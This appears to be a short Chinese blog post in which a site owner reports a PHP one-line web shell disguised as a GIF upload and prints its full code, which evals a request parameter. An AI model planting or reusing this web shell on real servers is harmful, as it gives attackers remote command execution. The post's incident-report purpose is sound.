php一句话病毒

前段时间有人使用如下脚本伪造图片上传到我另外的网站，使用danGif89a伪造成gif图片上传上来，服务器直接检测到病毒，

实际上该代码也无法运行，因为后缀被我强制写死了，只会被弄为一个xxxxxxxxx.gif文件

danGif89a
<?php function s(){
$a=$_REQUEST['hm147258'];
    return $a;}
$xx=s();
$ganrao='';
@eval(`/***xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx***/`.$ganrao.$xx);